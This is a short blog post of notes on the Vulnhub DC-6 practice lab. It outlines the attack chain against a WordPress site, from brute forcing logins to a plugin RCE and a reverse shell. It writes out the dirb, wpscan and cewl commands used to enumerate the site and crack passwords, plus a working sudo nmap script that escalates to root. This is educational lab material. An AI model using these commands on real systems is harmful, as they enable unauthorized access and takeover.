Vulnhub——DC-6渗透

一、涉及漏洞类型:

暴力破解

RCE

CMS插件漏洞

二、渗透思路:

主机发现 => 端口扫描 => 访问web服务 => 暴破登录 => 利用已知漏洞RCE => nc反弹shell => 切换用户 => nmap提权 => 找到最终flag

三、学到知识点:

1.dirb 

dirb是一个基于字典的web目录扫描工具,会用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站

dirb http://wordy/

对站点进行目录扫描

 2.wpscan 

这是一款Wordpress的专用扫描器

wpscan --url http://wordy/ -e u
wpscan --url wordy -U wordy-users.dic -P wordy-pass1.dic

爆破网站用户名

对用户名和密码进行爆破

3.cewl 

cewl是一个 ruby 应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个单词列表,这个列表可以扔到John the ripper工具里进行密码破解

cewl wordy -w wordy-pass.dic

生成密码字典wordy-pass.dic

4.插件Activity monitor

WordPress的一个存在远程命令执行的插件

5.

echo "os.execute('/bin/bash')" >> root1
sudo nmap --script=root1

将os.execute('/bin/bash')命令写入到root1文件中

执行nmap命令进行提权

四、参考: 

https://blog.csdn.net/weixin_52497013/article/details/122182340

https://www.freesion.com/article/1437605354/

https://blog.csdn.net/qq_45722813/article/details/121758837?spm=1001.2014.3001.5501

posted @ 2022-03-10 20:02  WeQi_Blog  阅读(71)  评论(0)    收藏  举报